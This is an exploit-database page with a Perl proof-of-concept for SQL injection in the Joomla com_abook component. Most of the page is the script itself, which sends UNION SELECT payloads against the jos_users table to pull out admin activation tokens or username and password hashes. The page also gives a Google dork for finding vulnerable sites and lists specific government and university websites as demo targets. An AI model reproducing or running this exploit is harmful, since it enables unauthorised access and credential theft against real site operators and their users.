Joomla com_abook Sql Injection

2016.01.24
Credit: Dz MinD Injector
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

### # Title : Exploit Joomla com_abook Sql Injection # Author : Dz MinD Injector # Home : Algeria 23000 d^_^b # FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector # Type : proof of concept # Tested on : Windows7 & Linux # Date : 24/01/2016 # Vendor Homepage : www.joomla.com ### # <?php # echo " Freedom t0 Palastine " ; # ?> # Lov3 Explo8ting Just For Fun ! ######## [ Proof / Exploit ] ################|=> #! Google Dork : #+ inurl:/index.php?option=com_abook # Demo : http://www.luas.gov.my/ http://www.unisza.edu.my/perpustakaan/ #!/usr/bin/perl use IO::Socket::INET; use LWP::UserAgent; system("clear"); print "------------------------------------------------------------------------\n"; print "########################################################################\n"; print "# Joomla com_abook Remote Sql Injection #\n"; print "# #\n"; print "# Author: Dz MinD Injector #\n"; print "# #\n"; print "# Greetz: Sige-Dz & Anon Jok & All Algerian HackerZ #\n"; print "########################################################################\n"; print "------------------------------------------------------------------------\n\n"; $target = $ARGV[0]; $component = $ARGV[1]; if($target eq '' || $component eq '') { print "Usage: ./exploit.pl <target> <Method Number> \n"; print "-----------------------------------\n"; print " Available Methods : \n"; print " 1- Get Activation Token Admin \n"; print " 2- Admin Hash \n"; print "-----------------------------------\n"; print " Example: ./exploit.pl http://www.site.com/ 1 \n\n"; exit(1); } open(FILE, "> contents11.txt"); if($target !~ /http:///) { $target = "http://$target"; } sleep 1.5; $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'); if($component == 1) { $host = $target . "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(activation,0x3a), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--"; print " . . Try to fond Activation Token Admin .. from $target . . \n\n"; sleep 1; $req = $agent->request(HTTP::Request->new(GET=>$host)); $content = $req->content; if($content =~ /([0-9a-fA-F]{32})/) { $password = $1; print "[+] Activation Token Admin Injected d^_^b --> $password .\n\n"; sleep 1; } else { print "[-] Activation Token Admin not found T_T . \n\n"; } } if($component == 2) { $host = $target . "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(username,0x3a,password), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--"; print " . . Retrieving Databasee... from $target . . \n\n"; sleep 1; $req = $agent->request(HTTP::Request->new(GET=>$host)); $content = $req->content; if($content =~ /([0-9a-fA-F]{32})/) { $password = $1; print "[+] Admin Hash d^_^b : --> $password .\n\n"; sleep 1; } else { print "[-] i'm Sorry traget not vulnerable T_T . \n\n"; } }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top